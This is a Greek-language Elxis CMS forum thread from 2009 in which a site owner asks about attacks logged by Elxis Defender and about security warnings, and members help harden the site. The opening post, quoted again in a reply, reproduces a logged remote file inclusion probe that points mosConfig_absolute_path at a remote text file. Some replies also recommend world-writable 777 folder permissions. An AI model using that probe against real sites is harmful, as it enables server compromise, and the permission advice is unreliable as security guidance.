Elxis CMS Forum
Ελληνικό Forum => Ασφάλεια => Topic started by: psiloscc on June 21, 2009, 12:27:38
-
Εδω και μερικες ημερες που εχω ενεργο το Elxis Defender εχω δει οτι μου κανουν πολλες επιθεσεις πχ.
//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=https://www.acaciacreek.org/assets/modules/docmanager/js/test.txt??
στον Καταγραφεα συνδεσεων ομως δεν βλεπω να εχει προσπαθησει καποιος να μπει στην διαχειρηση.
με παρομοιες εντολες οπως την παραπανω τι θα καταφερουν να κανουν αν τελικα με χακαρουν? δλδ θα μου αλλαξουν τους τιτλους με καποια μυνηματα, θα μου περασουν προγραμα για να παιρνουν ιο οσοι μπαινουν στο σιτε....
Εαν μου χακαρουν το site εγω πως θα το καταλαβω?
Μπορειτε να μου πειτε εκτος το Defender, Καταγραφεα συνδεσεων κλπ. τα οποια δεν ηξερα καν τι ητανε εαν πρεπει να πειραξω κατι σε καποιο αρχειο ή φακελο?
Ψαχνοντας στο φορουμ ειδα καπου για το Updiag και μπηκα στην διαχειρηση μου, πατησα Updiag/ασφαλεια και μου εβγαλε αυτα:
Συναγερμός PHP functions system, exec, passthru, shell_exec are enabled
Συναγερμός PHP allows openning remote files
Προειδοποίηση Elxis error reporting is set to ON
Προειδοποίηση Elxis FloodBlocker is disabled
αυτα ειναι επικινδηνα? και γιατι τα εχει, εχω πειραξει εγω καποια αρχεια απο τα default toy elxis, φταιει ο σερβερ...
-
Συναγερμός PHP functions system, exec, passthru, shell_exec are enabled
Συναγερμός PHP allows openning remote files
Αυτά έχουν να κάνουν με τις ρυθμίσεις του php.ini του server που είσαι και είναι βασικές για την προστασία σου.Θα πρέπει να επικοινωνήσεις με τον υπεύθυνο του hosting που είσαι .
Προειδοποίηση Elxis error reporting is set to ON
Προειδοποίηση Elxis FloodBlocker is disabled
Οι παραπάνω ρυθμίσεις είναι μέσα απο το elxis και μπορείς να τις αλλάξεις η πρώτη είναι στις γενικές ρυθμίσεις και πρέπει να επιλέξεις να μην εμφανίζονται τα λάθη ενώ το δεύτερο μέσα από τα εργαλεία.
//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=https://www.acaciacreek.org/assets/modules/docmanager/js/test.txt??
Το ίδιο είχα και εγώ πρίν λίγο .. όσο έχεις το defender on και τα σωστά φίλτρα δεν έχεις πρόβλημα
-
Σε ευχαριστω...
1, Το Αναφορά Σφαλμάτων: το εκανα κανενα ετσι πρεπει?
2, το FloodBlocker τι ειναι? εαν το ενεργοποιησω πρεπει να πειραξω και τις ρυθμισεις που εχει?
3, τωρα ειδα και ενα σφαλμα στην βαση..παω στο Διαχειριστής Βάσης Δεδομένων/Παρατηρητήριο Βάσης Δεδομένων [stats]
και απο κατω μου εχει μια κοκκινη γραμη και γραφει: mysqli Σφάλμα [1227] : EXECUTE
URI: index3.php?option=com_database&task=monexec&do=stats
Message: Access denied; you need the SUPER privilege for this operation
show innodb status
και στο InnoDB cache hit ratio γραφει με κοκκινα: Cache ratio should be at least 90%
εχει να κανει με τον σερβερ η την βαση?
-
1, Το Αναφορά Σφαλμάτων: το εκανα κανενα ετσι πρεπει?
Σωστά ;)
2, το FloodBlocker τι ειναι? εαν το ενεργοποιησω πρεπει να πειραξω και τις ρυθμισεις που εχει?
Είναι ένα χρήσιμο εργαλείο για την προστασία σου από υπερχείλιση.Τι σημαίνει αυτό .. με απλά λόγια κάποιος προσπαθεί να σου δημιουργήσει πρόβλημα κάνοντας συνεχή αναζητήσεις η κλίκ σε μικρό χρονικό διάστημα χωρίς λόγο ώστε να δημιουργήσει πρόβλημα στον σέρβερ σου . Οι ρυθμίσεις μέσα έχουν το χρονικό όριο και τα επιτρεπόμενα όρια μπορείς να τα αυξήσεις κατά βούληση εάν σε μπλοκάρει.
mysqli Σφάλμα [1227] : EXECUTE
Αυτό δεν το ξέρω και δεν το έχω αντιμετωπίσει ξανά θα πρέπει κάποιο μέλος με περισσότερες γνώσεις να σου απαντήσει. (Οι φάκελοι cache & tmpr είναι 777;)
-
Σε ευχαριστω πολυ για την βοηθεια!
εσβησα τις 2 προειδοποιησεις απο την διαχειρηση και μεχρι αυριο μου ειπαν οτι θα εχουν φτιαξει και τα αλλα 2 απο τον σερβερ.
Το μονο που μενει τωρα ειναι αυτο:
3, τωρα ειδα και ενα σφαλμα στην βαση..παω στο Διαχειριστής Βάσης Δεδομένων/Παρατηρητήριο Βάσης Δεδομένων [stats]
και απο κατω μου εχει μια κοκκινη γραμη και γραφει: mysqli Σφάλμα [1227] : EXECUTE
URI: index3.php?option=com_database&task=monexec&do=stats
Message: Access denied; you need the SUPER privilege for this operation
show innodb status
Οι φάκελοι cache & tmpr απο οτι βλεπω στις ιδιοτητες απο το filezilla ειναι 755, το κανω 777 και οταν ξανα παταω ιδιοτητες αρχειου πανω στον φακελο μου λεει οτι ειναι παλι 755.
-
Οι φάκελοι cache & tmpr απο οτι βλεπω στις ιδιοτητες απο το filezilla ειναι 755, το κανω 777 και οταν ξανα παταω ιδιοτητες αρχειου πανω στον φακελο μου λεει οτι ειναι παλι 755.
Ο χρήστης που έχεις ορίσει στο ftp έχει όλα τα δικαιώματα;
Δοκίμασε να μπείς με άλλο ftp πρόγραμμα (core ftp lite είναι δωρεάν) εάν και πάλι δεν κάνεις κάτι μίλα με το hosting σου.
-
Οι φάκελοι cache & tmpr απο οτι βλεπω στις ιδιοτητες απο το filezilla ειναι 755, το κανω 777 και οταν ξανα παταω ιδιοτητες αρχειου πανω στον φακελο μου λεει οτι ειναι παλι 755.
Ο χρήστης που έχεις ορίσει στο ftp έχει όλα τα δικαιώματα;
Δοκίμασε να μπείς με άλλο ftp πρόγραμμα (core ftp lite είναι δωρεάν) εάν και πάλι δεν κάνεις κάτι μίλα με το hosting σου.
Εκλεισα το filezilla και το ξανα ανοιξα και τωρα μου αλλαξε κανονικα τους φακελους σε 777 αλλα το mysqli Σφάλμα [1227] : EXECUTE δεν εχω βρει ακομα τι φταιει.
-
αλλα το mysqli Σφάλμα [1227] : EXECUTE δεν εχω βρει ακομα τι φταιει.
Από μια γρήγορη αναζήτηση που έκανα, κατάλαβα ότι είναι θέμα δικαιωμάτων (server error).
Χρήσιμο: MySQL Error Codes
http://www.phpro.org/articles/MySQL-Error-Codes.html
-
Εκλεισα το filezilla και το ξανα ανοιξα και τωρα μου αλλαξε κανονικα τους φακελους σε 777 αλλα το mysqli Σφάλμα [1227] : EXECUTE δεν εχω βρει ακομα τι φταιει.
Message: Access denied; you need the SUPER privilege for this operation
show innodb status
ααφού στο λέει!
δεν έχεις όλα τα δικαώματα στη βάση
-
καλημερα! και πως φτιαχνω τα δικαιωματα? πειραζω κατι στο index3.php που ειναι στον φακελο administrator, ή ειναι δουλεια της εταιριας που μου παρεχει host?
-
Είναι δουλειά δικιά σου. Επίσης, τα δικαιώματα δεν εχουν καμία σχέση με την εγκατάσταση του Elxis κλπ αρχεία.
Θα το κοιτάξεις μέσα από το control panel του πακέτου φιλοξενίας σου.
-
οκ! θα το δω..τα υπολοιπα (οι προηδοποιησεις ειναι οκ τωρα) σας ευχαριστω ολους!!!